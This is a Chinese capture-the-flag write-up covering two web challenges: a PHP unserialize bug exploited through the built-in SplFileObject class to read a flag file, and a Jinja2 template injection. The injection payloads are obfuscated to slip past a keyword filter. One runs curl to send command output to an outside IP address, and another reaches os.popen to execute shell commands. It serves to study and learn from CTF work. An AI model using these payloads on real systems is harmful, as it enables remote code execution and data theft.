前言 复现Rctf的比赛,复现到一半发现其他都是不过10解的数,就没在看了,看了一下xman的比赛解出来的人数还挺多,于是就想说去看看
ezphp <?php error_reporting(0 ); highlight_file(__FILE__ ); class XMAN public $class; public $para; public $check; public function __construct ( { $this ->class = "Hel" ; $this ->para = "xctfer" ; echo new $this ->class ($this ->para); } public function __wakeup ( { $this ->check = new Filter; if ($this ->check->vaild($this ->para) && $this ->check->vaild($this ->class)) { echo new $this ->class ($this ->para); } else die ('what?Really?' ); } } class Hel var $a; public function __construct ($a ) { $this ->a = $a; echo ("Hello bro, I guess you are a lazy " .$this ->a); } } class Filter function vaild ($code ) $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i' ; if (preg_match($pattern, $code)){ return false ; } else return true ; } } if (isset ($_GET['xctf' ])){ unserialize($_GET['xctf' ]); } else { $a=new XMAN; }
自己写个demo复现一下看看,反序列题,却又没给可以命令执行或者读文件的函数,那八成就是考察内置类了,定位了一下,似乎也就是这里了
先构造一下链条,看看如何到这里,再去寻找内置类:
<?php class XMAN{ public $class; public $para; public $check; public function __construct() { } public function __wakeup() { $this->check = new Filter; if($this->check->vaild($this->para) && $this->check->vaild($this->class)) { echo new $this->class ($this->para); } else die('what?Really?'); } } class Hel{ } class Filter{ function vaild($code){ $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i'; if (preg_match($pattern, $code)){ return false; } else return true; } } $a=new XMAN(); $b='SplFileObject'; $c='flag.txt'; $a->class=$b; $a->para=$c; echo serialize($a);
根本就不用咋构造哈哈哈哈=-=,偶尔做做简单题,增强一下自信心
你的名字 听说这题是原题,发现自己buu这题也还没做,做一下:
这不是一看就大概率是模板注入了?测试一下看看是什么模板
{% iconfigf '' .__claconfigss__.__mconfigro__[2 ].__subclasconfigses__()[59 ].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://110.42.133.120:9999/ -d `ls / | grep flag`;' ) %}1 {% endiconfigf %}
{%set a='__bui' +'ltins__' %} {%set b='__im' +'port__' %} {%set c='o' +'s' %} {%set d='po' +'pen' %} {%print(lipsum['__globals__' ][a][b](c)[d]('ls /' )['read' ]())%}
